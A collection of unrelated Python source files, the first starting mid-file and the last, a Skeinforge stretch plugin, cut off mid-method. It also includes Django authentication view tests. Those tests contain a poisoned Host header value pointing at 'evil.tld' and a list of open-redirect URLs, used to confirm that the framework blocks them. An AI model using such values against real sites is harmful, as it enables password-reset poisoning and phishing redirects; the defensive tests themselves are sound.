def _setup(self):
# xpaths
self._xpaths.add_profile(value='/application-filter')
# params
params = []
params.append(VersionedParamPath(
'category', path='category', vartype='member'))
params.append(VersionedParamPath(
'subcategory', path='subcategory', vartype='member'))
params.append(VersionedParamPath(
'technology', path='technology', vartype='member'))
params.append(VersionedParamPath(
'risk', path='risk', vartype='member'))
params.append(VersionedParamPath(
'evasive', path='evasive', vartype='yesno'))
params.append(VersionedParamPath(
'excessive_bandwidth_use', path='excessive-bandwidth-use', vartype='yesno'))
params.append(VersionedParamPath(
'prone_to_misuse', path='prone-to-misuse', vartype='yesno'))
params.append(VersionedParamPath(
'is_saas', path='is-saas', vartype='yesno'))
params.append(VersionedParamPath(
'transfers_files', path='transfers-files', vartype='yesno'))
params.append(VersionedParamPath(
'tunnels_other_apps', path='tunnels-other-apps', vartype='yesno'))
params.append(VersionedParamPath(
'used_by_malware', path='used-by-malware', vartype='yesno'))
params.append(VersionedParamPath(
'has_known_vulnerabilities', path='has-known-vulnerabilities', vartype='yesno'))
params.append(VersionedParamPath(
'pervasive', path='pervasive', vartype='yesno'))
params.append(VersionedParamPath(
'tag', path='tag', vartype='member'))
self._params = tuple(params)
class ApplicationContainer(VersionedPanObject):
"""ApplicationContainer object
This is a special class that is used in the predefined module.
It acts much like an ApplicationGroup object but exists only
in the predefined context. It is more or less a way that
Palo Alto groups predefined applications together.
Args:
        applications (list): List of member applications
"""
ROOT = Root.VSYS
SUFFIX = ENTRY
def _setup(self):
# xpaths
self._xpaths.add_profile(value='/application-container')
# params
params = []
params.append(VersionedParamPath(
'applications', path='functions', vartype='member'))
self._params = tuple(params)
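# Hedged usage sketch (not part of the original file): these objects are
# normally attached to a device tree and pushed with create(), e.g.
#   from pandevice.firewall import Firewall
#   fw = Firewall('192.0.2.1', 'admin', 'password')
#   addr = fw.add(AddressObject('web-srv', '10.0.1.5/32', description='web server'))
#   addr.create()
# The Firewall import path and the add()/create() calls belong to the wider
# pandevice API and are assumptions here; addresses and credentials are
# illustrative.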
|
PaloAltoNetworks/terraform-templates
|
pan_guard_duty/lambda_code/pandevice/objects.py
|
Python
|
apache-2.0
| 16,190
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("JEEVES_SETTINGS_MODULE", "settings")
from jeeves.core.management import execute_from_command_line
execute_from_command_line(sys.argv[1:])
|
silent1mezzo/jeeves-framework
|
jeeves/conf/project_template/bot.py
|
Python
|
isc
| 246
|
# -*- coding: utf-8 -*-
class TrafficEntry:
def __init__(self, broadcast_count=0L, broadcast_bytes=0L, unicast_count=0L, unicast_bytes=0L):
self.broadcast_count = broadcast_count
self.broadcast_bytes = broadcast_bytes
self.unicast_count = unicast_count
self.unicast_bytes = unicast_bytes
class Traffic:
    def __init__(self, send=None, recv=None):
        # Use None defaults so each Traffic gets its own TrafficEntry objects
        # instead of sharing a single mutable default instance.
        self.send = send if send is not None else TrafficEntry()
        self.recv = recv if recv is not None else TrafficEntry()
def in_rpc_traffic(self, pack):
if pack is None:
return
self.recv.broadcast_bytes = pack.get_value("Recv.BroadcastBytes")
self.recv.broadcast_count = pack.get_value("Recv.BroadcastCount")
self.recv.unicast_bytes = pack.get_value("Recv.UnicastBytes")
self.recv.unicast_count = pack.get_value("Recv.UnicastCount")
self.send.broadcast_bytes = pack.get_value("Send.BroadcastBytes")
self.send.broadcast_count = pack.get_value("Send.BroadcastCount")
self.send.unicast_bytes = pack.get_value("Send.UnicastBytes")
self.send.unicast_count = pack.get_value("Send.UnicastCount")
|
relman/sevpn-mgmt-py
|
SevpnMgmtPy/admin_api/traffic.py
|
Python
|
mit
| 1,143
|
import os
import re
import urllib
from django.conf import settings
from django.contrib.auth import SESSION_KEY, REDIRECT_FIELD_NAME
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.sites.models import Site, RequestSite
from django.contrib.auth.models import User
from django.test import TestCase
from django.core import mail
from django.core.exceptions import SuspiciousOperation
from django.core.urlresolvers import reverse
from django.http import QueryDict
class AuthViewsTestCase(TestCase):
"""
Helper base class for all the follow test cases.
"""
fixtures = ['authtestdata.json']
urls = 'django.contrib.auth.tests.urls'
def setUp(self):
self.old_LANGUAGES = settings.LANGUAGES
self.old_LANGUAGE_CODE = settings.LANGUAGE_CODE
settings.LANGUAGES = (('en', 'English'),)
settings.LANGUAGE_CODE = 'en'
self.old_TEMPLATE_DIRS = settings.TEMPLATE_DIRS
settings.TEMPLATE_DIRS = (
os.path.join(os.path.dirname(__file__), 'templates'),
)
def tearDown(self):
settings.LANGUAGES = self.old_LANGUAGES
settings.LANGUAGE_CODE = self.old_LANGUAGE_CODE
settings.TEMPLATE_DIRS = self.old_TEMPLATE_DIRS
def login(self, password='password'):
response = self.client.post('/login/', {
'username': 'testclient',
'password': password
}
)
self.assertEqual(response.status_code, 302)
self.assertTrue(response['Location'].endswith(settings.LOGIN_REDIRECT_URL))
self.assertTrue(SESSION_KEY in self.client.session)
class PasswordResetTest(AuthViewsTestCase):
def test_email_not_found(self):
"Error is raised if the provided email address isn't currently registered"
response = self.client.get('/password_reset/')
self.assertEqual(response.status_code, 200)
response = self.client.post('/password_reset/', {'email': 'not_a_real_email@email.com'})
self.assertContains(response, "That e-mail address doesn't have an associated user account")
self.assertEqual(len(mail.outbox), 0)
def test_email_found(self):
"Email is sent if a valid email address is provided for password reset"
response = self.client.post('/password_reset/', {'email': 'staffmember@example.com'})
self.assertEqual(response.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
self.assertTrue("http://" in mail.outbox[0].body)
self.assertEqual(settings.DEFAULT_FROM_EMAIL, mail.outbox[0].from_email)
def test_email_found_custom_from(self):
"Email is sent if a valid email address is provided for password reset when a custom from_email is provided."
response = self.client.post('/password_reset_from_email/', {'email': 'staffmember@example.com'})
self.assertEqual(response.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
self.assertEqual("staffmember@example.com", mail.outbox[0].from_email)
def test_admin_reset(self):
"If the reset view is marked as being for admin, the HTTP_HOST header is used for a domain override."
response = self.client.post('/admin_password_reset/',
{'email': 'staffmember@example.com'},
HTTP_HOST='adminsite.com'
)
self.assertEqual(response.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
self.assertTrue("http://adminsite.com" in mail.outbox[0].body)
self.assertEqual(settings.DEFAULT_FROM_EMAIL, mail.outbox[0].from_email)
def test_poisoned_http_host(self):
"Poisoned HTTP_HOST headers can't be used for reset emails"
# This attack is based on the way browsers handle URLs. The colon
# should be used to separate the port, but if the URL contains an @,
# the colon is interpreted as part of a username for login purposes,
# making 'evil.com' the request domain. Since HTTP_HOST is used to
# produce a meaningful reset URL, we need to be certain that the
# HTTP_HOST header isn't poisoned. This is done as a check when get_host()
# is invoked, but we check here as a practical consequence.
def test_host_poisoning():
self.client.post('/password_reset/',
{'email': 'staffmember@example.com'},
HTTP_HOST='www.example:dr.frankenstein@evil.tld'
)
self.assertRaises(SuspiciousOperation, test_host_poisoning)
self.assertEqual(len(mail.outbox), 0)
def test_poisoned_http_host_admin_site(self):
"Poisoned HTTP_HOST headers can't be used for reset emails on admin views"
def test_host_poisoning():
self.client.post('/admin_password_reset/',
{'email': 'staffmember@example.com'},
HTTP_HOST='www.example:dr.frankenstein@evil.tld'
)
self.assertRaises(SuspiciousOperation, test_host_poisoning)
self.assertEqual(len(mail.outbox), 0)
def _test_confirm_start(self):
# Start by creating the email
response = self.client.post('/password_reset/', {'email': 'staffmember@example.com'})
self.assertEqual(response.status_code, 302)
self.assertEqual(len(mail.outbox), 1)
return self._read_signup_email(mail.outbox[0])
def _read_signup_email(self, email):
urlmatch = re.search(r"https?://[^/]*(/.*reset/\S*)", email.body)
self.assertTrue(urlmatch is not None, "No URL found in sent email")
return urlmatch.group(), urlmatch.groups()[0]
def test_confirm_valid(self):
url, path = self._test_confirm_start()
response = self.client.get(path)
# redirect to a 'complete' page:
self.assertEqual(response.status_code, 200)
self.assertTrue("Please enter your new password" in response.content)
def test_confirm_invalid(self):
url, path = self._test_confirm_start()
# Let's munge the token in the path, but keep the same length,
# in case the URLconf will reject a different length.
path = path[:-5] + ("0"*4) + path[-1]
response = self.client.get(path)
self.assertEqual(response.status_code, 200)
self.assertTrue("The password reset link was invalid" in response.content)
def test_confirm_invalid_user(self):
        # Ensure that we get a 200 response for a non-existent user, not a 404
response = self.client.get('/reset/123456-1-1/')
self.assertEqual(response.status_code, 200)
self.assertTrue("The password reset link was invalid" in response.content)
def test_confirm_overflow_user(self):
# Ensure that we get a 200 response for a base36 user id that overflows int
response = self.client.get('/reset/zzzzzzzzzzzzz-1-1/')
self.assertEqual(response.status_code, 200)
self.assertTrue("The password reset link was invalid" in response.content)
def test_confirm_invalid_post(self):
# Same as test_confirm_invalid, but trying
# to do a POST instead.
url, path = self._test_confirm_start()
path = path[:-5] + ("0"*4) + path[-1]
response = self.client.post(path, {'new_password1': 'anewpassword',
'new_password2':' anewpassword'})
# Check the password has not been changed
u = User.objects.get(email='staffmember@example.com')
self.assertTrue(not u.check_password("anewpassword"))
def test_confirm_complete(self):
url, path = self._test_confirm_start()
response = self.client.post(path, {'new_password1': 'anewpassword',
'new_password2': 'anewpassword'})
# It redirects us to a 'complete' page:
self.assertEqual(response.status_code, 302)
# Check the password has been changed
u = User.objects.get(email='staffmember@example.com')
self.assertTrue(u.check_password("anewpassword"))
# Check we can't use the link again
response = self.client.get(path)
self.assertEqual(response.status_code, 200)
self.assertTrue("The password reset link was invalid" in response.content)
def test_confirm_different_passwords(self):
url, path = self._test_confirm_start()
response = self.client.post(path, {'new_password1': 'anewpassword',
'new_password2':' x'})
self.assertEqual(response.status_code, 200)
self.assertTrue("The two password fields didn't match" in response.content)
class ChangePasswordTest(AuthViewsTestCase):
def fail_login(self, password='password'):
response = self.client.post('/login/', {
'username': 'testclient',
'password': password
}
)
self.assertEqual(response.status_code, 200)
self.assertTrue("Please enter a correct username and password. Note that both fields are case-sensitive." in response.content)
def logout(self):
response = self.client.get('/logout/')
def test_password_change_fails_with_invalid_old_password(self):
self.login()
response = self.client.post('/password_change/', {
'old_password': 'donuts',
'new_password1': 'password1',
'new_password2': 'password1',
}
)
self.assertEqual(response.status_code, 200)
self.assertTrue("Your old password was entered incorrectly. Please enter it again." in response.content)
def test_password_change_fails_with_mismatched_passwords(self):
self.login()
response = self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'donuts',
}
)
self.assertEqual(response.status_code, 200)
self.assertTrue("The two password fields didn't match." in response.content)
def test_password_change_succeeds(self):
self.login()
response = self.client.post('/password_change/', {
'old_password': 'password',
'new_password1': 'password1',
'new_password2': 'password1',
}
)
self.assertEqual(response.status_code, 302)
self.assertTrue(response['Location'].endswith('/password_change/done/'))
self.fail_login()
self.login(password='password1')
class LoginTest(AuthViewsTestCase):
def test_current_site_in_context_after_login(self):
response = self.client.get(reverse('django.contrib.auth.views.login'))
self.assertEqual(response.status_code, 200)
if Site._meta.installed:
site = Site.objects.get_current()
self.assertEqual(response.context['site'], site)
self.assertEqual(response.context['site_name'], site.name)
else:
self.assertIsInstance(response.context['site'], RequestSite)
self.assertTrue(isinstance(response.context['form'], AuthenticationForm),
'Login form is not an AuthenticationForm')
def test_security_check(self, password='password'):
login_url = reverse('django.contrib.auth.views.login')
# Those URLs should not pass the security check
for bad_url in ('http://example.com',
'https://example.com',
'ftp://exampel.com',
'//example.com'):
nasty_url = '%(url)s?%(next)s=%(bad_url)s' % {
'url': login_url,
'next': REDIRECT_FIELD_NAME,
'bad_url': urllib.quote(bad_url)
}
response = self.client.post(nasty_url, {
'username': 'testclient',
'password': password,
}
)
self.assertEqual(response.status_code, 302)
self.assertFalse(bad_url in response['Location'],
"%s should be blocked" % bad_url)
# These URLs *should* still pass the security check
for good_url in ('/view/?param=http://example.com',
'/view/?param=https://example.com',
'/view?param=ftp://exampel.com',
'view/?param=//example.com',
'https:///',
'//testserver/',
'/url%20with%20spaces/', # see ticket #12534
):
safe_url = '%(url)s?%(next)s=%(good_url)s' % {
'url': login_url,
'next': REDIRECT_FIELD_NAME,
'good_url': urllib.quote(good_url)
}
response = self.client.post(safe_url, {
'username': 'testclient',
'password': password,
}
)
self.assertEqual(response.status_code, 302)
self.assertTrue(good_url in response['Location'],
"%s should be allowed" % good_url)
class LoginURLSettings(AuthViewsTestCase):
urls = 'django.contrib.auth.tests.urls'
def setUp(self):
super(LoginURLSettings, self).setUp()
self.old_LOGIN_URL = settings.LOGIN_URL
def tearDown(self):
super(LoginURLSettings, self).tearDown()
settings.LOGIN_URL = self.old_LOGIN_URL
def get_login_required_url(self, login_url):
settings.LOGIN_URL = login_url
response = self.client.get('/login_required/')
self.assertEqual(response.status_code, 302)
return response['Location']
def test_standard_login_url(self):
login_url = '/login/'
login_required_url = self.get_login_required_url(login_url)
querystring = QueryDict('', mutable=True)
querystring['next'] = '/login_required/'
self.assertEqual(login_required_url,
'http://testserver%s?%s' % (login_url, querystring.urlencode('/')))
def test_remote_login_url(self):
login_url = 'http://remote.example.com/login'
login_required_url = self.get_login_required_url(login_url)
querystring = QueryDict('', mutable=True)
querystring['next'] = 'http://testserver/login_required/'
self.assertEqual(login_required_url,
'%s?%s' % (login_url, querystring.urlencode('/')))
def test_https_login_url(self):
login_url = 'https:///login/'
login_required_url = self.get_login_required_url(login_url)
querystring = QueryDict('', mutable=True)
querystring['next'] = 'http://testserver/login_required/'
self.assertEqual(login_required_url,
'%s?%s' % (login_url, querystring.urlencode('/')))
def test_login_url_with_querystring(self):
login_url = '/login/?pretty=1'
login_required_url = self.get_login_required_url(login_url)
querystring = QueryDict('pretty=1', mutable=True)
querystring['next'] = '/login_required/'
self.assertEqual(login_required_url, 'http://testserver/login/?%s' %
querystring.urlencode('/'))
def test_remote_login_url_with_next_querystring(self):
login_url = 'http://remote.example.com/login/'
login_required_url = self.get_login_required_url('%s?next=/default/' %
login_url)
querystring = QueryDict('', mutable=True)
querystring['next'] = 'http://testserver/login_required/'
self.assertEqual(login_required_url, '%s?%s' % (login_url,
querystring.urlencode('/')))
class LogoutTest(AuthViewsTestCase):
urls = 'django.contrib.auth.tests.urls'
def confirm_logged_out(self):
self.assertTrue(SESSION_KEY not in self.client.session)
def test_logout_default(self):
"Logout without next_page option renders the default template"
self.login()
response = self.client.get('/logout/')
self.assertEqual(200, response.status_code)
self.assertTrue('Logged out' in response.content)
self.confirm_logged_out()
def test_14377(self):
# Bug 14377
self.login()
response = self.client.get('/logout/')
self.assertTrue('site' in response.context)
def test_logout_with_overridden_redirect_url(self):
# Bug 11223
self.login()
response = self.client.get('/logout/next_page/')
self.assertEqual(response.status_code, 302)
self.assertTrue(response['Location'].endswith('/somewhere/'))
response = self.client.get('/logout/next_page/?next=/login/')
self.assertEqual(response.status_code, 302)
self.assertTrue(response['Location'].endswith('/login/'))
self.confirm_logged_out()
def test_logout_with_next_page_specified(self):
"Logout with next_page option given redirects to specified resource"
self.login()
response = self.client.get('/logout/next_page/')
self.assertEqual(response.status_code, 302)
self.assertTrue(response['Location'].endswith('/somewhere/'))
self.confirm_logged_out()
def test_logout_with_redirect_argument(self):
"Logout with query string redirects to specified resource"
self.login()
response = self.client.get('/logout/?next=/login/')
self.assertEqual(response.status_code, 302)
self.assertTrue(response['Location'].endswith('/login/'))
self.confirm_logged_out()
def test_logout_with_custom_redirect_argument(self):
"Logout with custom query string redirects to specified resource"
self.login()
response = self.client.get('/logout/custom_query/?follow=/somewhere/')
self.assertEqual(response.status_code, 302)
self.assertTrue(response['Location'].endswith('/somewhere/'))
self.confirm_logged_out()
def test_security_check(self, password='password'):
logout_url = reverse('django.contrib.auth.views.logout')
# Those URLs should not pass the security check
for bad_url in ('http://example.com',
'https://example.com',
'ftp://exampel.com',
'//example.com'
):
nasty_url = '%(url)s?%(next)s=%(bad_url)s' % {
'url': logout_url,
'next': REDIRECT_FIELD_NAME,
'bad_url': urllib.quote(bad_url)
}
self.login()
response = self.client.get(nasty_url)
self.assertEqual(response.status_code, 302)
self.assertFalse(bad_url in response['Location'],
"%s should be blocked" % bad_url)
self.confirm_logged_out()
# These URLs *should* still pass the security check
for good_url in ('/view/?param=http://example.com',
'/view/?param=https://example.com',
'/view?param=ftp://exampel.com',
'view/?param=//example.com',
'https:///',
'//testserver/',
'/url%20with%20spaces/', # see ticket #12534
):
safe_url = '%(url)s?%(next)s=%(good_url)s' % {
'url': logout_url,
'next': REDIRECT_FIELD_NAME,
'good_url': urllib.quote(good_url)
}
self.login()
response = self.client.get(safe_url)
self.assertEqual(response.status_code, 302)
self.assertTrue(good_url in response['Location'],
"%s should be allowed" % good_url)
self.confirm_logged_out()
|
MiltosD/CEFELRC
|
lib/python2.7/site-packages/django/contrib/auth/tests/views.py
|
Python
|
bsd-3-clause
| 19,815
|
################################################################################################################
#
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
################################################################################################################
# Copyright 2021 Google LLC
## Perform BERT text pre-processing
## Minimal pre-processing function: lower-case the raw comment text and rename
## the fields to the names expected downstream ('text' and 'label').
import tensorflow as tf
def preprocessing_fn(inputs):
    inputs['comment_text'] = tf.strings.lower(inputs['comment_text'])
    return {
        'text': inputs['comment_text'],
        'label': inputs['target']
    }
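# Hedged usage sketch (not part of the original file): inside a TFX / TensorFlow
# Transform pipeline this function is called by the Transform component on a
# dict of raw feature tensors, roughly as
#   preprocessing_fn({'comment_text': tf.constant(['Hello THERE']),
#                     'target': tf.constant([0.0])})
# which maps the text to its lower-cased form under the 'text' key and passes
# 'target' through as 'label'. The literal values are illustrative only.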
|
googleforgames/clean-chat
|
components/model/bert/preprocessing.py
|
Python
|
apache-2.0
| 1,145
|
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright 2015-2018 by Exopy Authors, see AUTHORS for more details.
#
# Distributed under the terms of the BSD license.
#
# The full license is in the file LICENCE, distributed with this software.
# -----------------------------------------------------------------------------
"""All possible contributions to plugin of the app package.
"""
from .app_extensions import AppStartup, AppClosing, AppClosed
__all__ = ['AppStartup', 'AppClosing', 'AppClosed']
|
Ecpy/ecpy
|
exopy/app/api.py
|
Python
|
bsd-3-clause
| 563
|
from __future__ import print_function
"""
Command-line script for exporting a Narrative to an HTML page.
"""
__author__ = "Bill Riehl <wjriehl@lbl.gov>"
from biokbase.narrative.narrativeio import PermissionsError
from biokbase.narrative.exporter.exporter import NarrativeExporter
import os
import sys
import argparse
def main(args):
if not args.narrative_ref:
print("Must include a Narrative object reference in the format XXX/YYY (these are the numbers in the usual Narrative URL)")
return 1
if not args.outfile:
print("Must include an output file for exporting the Narrative!")
return 1
outfile = args.outfile
if not outfile.lower().endswith(".html"):
outfile = outfile + ".html"
exporter = NarrativeExporter()
try:
exporter.export_narrative(args.narrative_ref, outfile)
except PermissionsError:
print("The Narrative at reference " + args.narrative_ref + " does not appear to be public!")
return 1
except Exception as e:
print("An error occurred while exporting your Narrative:")
print(str(e))
return 1
def parse_args():
p = argparse.ArgumentParser(description="Exports a Narrative to an HTML page.")
p.add_argument("-n", "--narrative", dest="narrative_ref", help="Narrative object reference")
p.add_argument("-o", "--output_file", dest="outfile", help="Output HTML file (.html will be appended if necessary)")
return p.parse_args()
if __name__ == '__main__':
sys.exit(main(parse_args()))
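# Hedged usage sketch (not part of the original file): based on the argparse
# options above, a typical invocation would be
#   python export_narrative.py -n 123/45 -o my_narrative.html
# The narrative reference is illustrative; '.html' is appended automatically
# if the output file name lacks it.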
|
mlhenderson/narrative
|
scripts/export_narrative.py
|
Python
|
mit
| 1,511
|
# Copyright (c) 2014 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A filter middleware that inspects the requested URI for a version string
and/or Accept headers and attempts to negotiate an API controller to
return
"""
from oslo_log import log as logging
from murano.api import versions
from murano.common.i18n import _LW
from murano.common import wsgi
LOG = logging.getLogger(__name__)
class VersionNegotiationFilter(wsgi.Middleware):
@classmethod
def factory(cls, global_conf, **local_conf):
def filter(app):
return cls(app)
return filter
def __init__(self, app):
self.versions_app = versions.Controller()
super(VersionNegotiationFilter, self).__init__(app)
def process_request(self, req):
"""Try to find a version first in the accept header, then the URL."""
LOG.debug(("Determining version of request:{method} {path} "
"Accept: {accept}").format(method=req.method,
path=req.path,
accept=req.accept))
LOG.debug("Using url versioning")
# Remove version in url so it doesn't conflict later
req_version = self._pop_path_info(req)
try:
version = self._match_version_string(req_version)
except ValueError:
LOG.warning(_LW("Unknown version. Returning version choices."))
return self.versions_app
req.environ['api.version'] = version
req.path_info = ''.join(('/v', str(version), req.path_info))
LOG.debug("Matched version: v{version}".format(version=version))
LOG.debug('new path {path}'.format(path=req.path_info))
return None
def _match_version_string(self, subject):
"""Tries to match major and/or minor version
Given a string, tries to match a major and/or
minor version number.
:param subject: The string to check
:returns version found in the subject
:raises ValueError if no acceptable version could be found
"""
if subject in ('v1',):
major_version = 1
else:
raise ValueError()
return major_version
def _pop_path_info(self, req):
"""Returns the popped off next segment
'Pops' off the next segment of PATH_INFO, returns the popped
segment. Do NOT push it onto SCRIPT_NAME.
"""
path = req.path_info
if not path:
return None
while path.startswith('/'):
path = path[1:]
idx = path.find('/')
if idx == -1:
idx = len(path)
r = path[:idx]
req.path_info = path[idx:]
return r
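# Illustrative paste-deploy wiring for this middleware; the section and
# pipeline names below are assumptions, not taken from this module:
#
#   [filter:versionnegotiation]
#   paste.filter_factory = murano.api.middleware.version_negotiation:VersionNegotiationFilter.factory
#
#   [pipeline:murano-api]
#   pipeline = versionnegotiation ... apiv1app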
|
DavidPurcell/murano_temp
|
murano/api/middleware/version_negotiation.py
|
Python
|
apache-2.0
| 3,306
|
from flask import Flask, jsonify, render_template, request
from werkzeug import secure_filename
#import inception_client
UPLOAD_FORDER = 'flaskr2/upload'
ALLOWED_EXTENSIONS = set(['txt','pdf','png','jpg','jpeg','gif'])
app = Flask(__name__,static_url_path='/flaskr2/static')
app.config['UPLOAD_FORDER'] = UPLOAD_FORDER
app.config['MAX_CONTENT_LENGTH'] = 16*1024*1024
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.',1)[1] in ALLOWED_EXTENSIONS
from flaskr2 import flaskr
|
yuzhao12/MindCamera
|
flaskr2/__init__.py
|
Python
|
mit
| 512
|
import argparse
import pysam
import sys
from Bio import SeqIO
from Bio.Seq import Seq
def _gen_seqs(bam):
"""Yield SeqIO records of the reference sequence each query is aligned to."""
for read in bam:
ref_seq = read.get_reference_sequence().upper()
name = '{}_{}'.format(read.reference_name, read.query_name)
yield SeqIO.SeqRecord(id=name, seq=Seq(ref_seq))
def main():
parser = argparse.ArgumentParser(
prog='ref_seqs_from_bam',
description='Extract reference sequence that queries are aligned to',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('bam', help='input bam file, MD tag must be set (mini_align -m).')
args = parser.parse_args()
with pysam.AlignmentFile(args.bam) as bam:
SeqIO.write(_gen_seqs(bam), sys.stdout, 'fasta')
if __name__ == '__main__':
main()
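# Illustrative invocation (file names are hypothetical). The BAM must carry MD
# tags (e.g. aligned with `mini_align -m`) so get_reference_sequence() works:
#
#   python ref_seqs_from_bam.py calls2ref.bam > ref_subseqs.fasta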
|
nanoporetech/pomoxis
|
pomoxis/ref_seqs_from_bam.py
|
Python
|
mpl-2.0
| 888
|
"""
This page is in the table of contents.
Stretch is a very important Skeinforge plugin that allows you to partially compensate for the fact that extruded holes
are smaller than they should be. It stretches the threads to partially compensate for filament shrinkage when extruded.
The stretch manual page is at:
http://fabmetheus.crsndoo.com/wiki/index.php/Skeinforge_Stretch
Extruded holes are smaller than the model because, while printing an arc, the head deposits filament on both sides of
the arc, but the inside of the arc actually needs less material than the outside. You can read
more about this on the RepRap ArcCompensation page:
http://reprap.org/bin/view/Main/ArcCompensation
In general, stretch will widen holes and push corners out. In practice the filament contraction will not be identical
to the algorithm, so even once the optimal parameters are determined, the stretch script will not be able to eliminate
the inaccuracies caused by contraction, but it should reduce them.
All the defaults assume that the thread sequence choice setting in fill is the edge being extruded first, then the
loops, then the infill. If the thread sequence choice is different, the optimal thread parameters will also be
different. In general, if the infill is extruded first, the infill would have to be stretched more so that even after
the filament shrinkage, it would still be long enough to connect to the loop or edge.
Holes should be made with the correct area for their radius. In other words, for example if your modeling program
approximates a hole of radius one (area = pi) by making a square with the points at [(1,0), (0,1), (-1,0), (0,-1)]
(area = 2), the radius should be increased by sqrt(pi/2). This can be done in fabmetheus xml by writing:
radiusAreal='True'
in the attributes of the object or any parent of that object. In other modeling programs, you'll have to do this manually
or write a script. If area compensation is not done, then changing the stretch parameters to over-compensate for
too-small hole areas will lead to incorrect compensation in other shapes.
==Settings==
===Loop Stretch Over Perimeter Width===
Default is 0.1.
Defines the ratio of the maximum amount the loop (aka inner shell) threads will be stretched compared to the edge width;
in general this value should be the same as the 'Perimeter Outside Stretch Over Perimeter Width' setting.
===Path Stretch Over Perimeter Width===
Default is zero.
Defines the ratio of the maximum amount the threads which are not loops, like the infill threads, will be stretched
compared to the edge width.
===Perimeter===
====Perimeter Inside Stretch Over Perimeter Width====
Default is 0.32.
Defines the ratio of the maximum amount the inside edge thread will be stretched compared to the edge width; this is
the most important setting in stretch. The higher the value, the more the edge will be stretched and the wider holes
will be. If the value is too small, the holes can be drilled out after fabrication; if the value is too high, the holes
will be too wide and the part will have to be junked.
====Perimeter Outside Stretch Over Perimeter Width====
Default is 0.1.
Defines the ratio of the maximum amount the outside edge thread will be stretched compared to the edge width; in
general this value should be around a third of the 'Perimeter Inside Stretch Over Perimeter Width' setting.
===Stretch from Distance over Perimeter Width===
Default is two.
The stretch algorithm works by checking, at each turning point on the extrusion path, what the direction of the thread
is at a distance of 'Stretch from Distance over Perimeter Width' times the edge width on both sides, and moving the
thread in the opposite direction. So it takes the current turning point, goes
"Stretch from Distance over Perimeter Width" * "Perimeter Width" ahead, and reads the direction at that point. Then it
goes the same distance back and reads the direction at that other point. It then moves the thread in the
opposite direction, away from the center of the arc formed by these two points and directions.
The magnitude of the stretch increases with:
how similar the directions of the two threads are, and
the '..Stretch Over Perimeter Width' ratio.
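For example (a worked illustration, not from the original documentation): with an edge width of 0.5 mm and the default
'Stretch from Distance over Perimeter Width' of two, the direction is sampled 1.0 mm ahead of and 1.0 mm behind each
turning point, and the point is pushed away from the center of the arc defined by those two samples by at most the
relevant '..Stretch Over Perimeter Width' fraction of the edge width (0.32 * 0.5 mm = 0.16 mm for the default inside
edge setting).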
==Examples==
The following examples stretch the file Screw Holder Bottom.stl. The examples are run in a terminal in the folder
which contains Screw Holder Bottom.stl and stretch.py.
> python stretch.py
This brings up the stretch dialog.
> python stretch.py Screw Holder Bottom.stl
The stretch tool is parsing the file:
Screw Holder Bottom.stl
..
The stretch tool has created the file:
.. Screw Holder Bottom_stretch.gcode
"""
from __future__ import absolute_import
import base64
import logging
import zlib
import re
from gcodeutils.gcoder import split, Line, parse_coordinates, unsplit, linear_move_gcodes
from .vector3 import Vector3
__author__ = 'Enrique Perez (perez_enrique@yahoo.com)'
__date__ = '$Date: 2008/21/04 $'
__license__ = 'GNU Affero General Public License http://www.gnu.org/licenses/agpl.html'
try:
xrange
except NameError:
xrange = range
def get_location_from_line(old_location, line):
"""Get the location from a GCode line, carrying over existing location."""
if old_location is None:
old_location = Vector3()
return Vector3(
line.x if line.x is not None else old_location.x,
line.y if line.y is not None else old_location.y,
line.z if line.z is not None else old_location.z,
)
def dot_product(lhs, rhs):
"""Get the dot product of a pair of complexes."""
return lhs.real * rhs.real + lhs.imag * rhs.imag
class LineIteratorForwardLegacy(object):
"""Forward line iterator class."""
logger = logging.getLogger('iterator')
def __init__(self, line_index, lines):
self.first_visited_index = None
self.line_index = line_index
self.lines = lines
self.increment = 1
self.stop_on_extrusion_off = True
self.logger.debug("started iterator with line_index = %d", self.line_index)
def index_setup(self):
pass
def reset_index_on_limit(self):
"""Get index just after the activate command."""
self.logger.debug("reset index forward")
for lineIndex in xrange(self.line_index - 1, 0, - 1):
if StretchFilter.EXTRUSION_ON_MARKER in self.lines[lineIndex].raw:
return lineIndex + 1
print('This should never happen in stretch, no activate command was found for this thread.')
raise StopIteration("You've reached the end of the line.")
def index_in_valid_range(self):
return 0 <= self.line_index < len(self.lines)
def get_next(self):
"""Get next line going backward or raise exception."""
self.index_setup()
while self.index_in_valid_range():
if self.line_index == self.first_visited_index:
self.logger.debug("infinite looping detected")
raise StopIteration("You've reached the end of the line.")
if self.first_visited_index is None:
self.first_visited_index = self.line_index
line = self.lines[self.line_index]
if StretchFilter.EXTRUSION_OFF_MARKER in line.raw and self.stop_on_extrusion_off:
self.line_index = self.reset_index_on_limit()
continue
self.line_index += self.increment
if line.command in linear_move_gcodes and (line.x is not None or line.y is not None):
self.logger.debug("found (%d) %s %s", self.increment, line.x, line.y)
return line
self.logger.debug("no more point in loop")
raise StopIteration("You've reached the end of the line.")
class LineIteratorBackwardLegacy(LineIteratorForwardLegacy):
"""Backward line iterator class."""
def __init__(self, line_index, lines):
super(LineIteratorBackwardLegacy, self).__init__(line_index, lines)
self.increment = -1
def index_setup(self):
if self.line_index < 1:
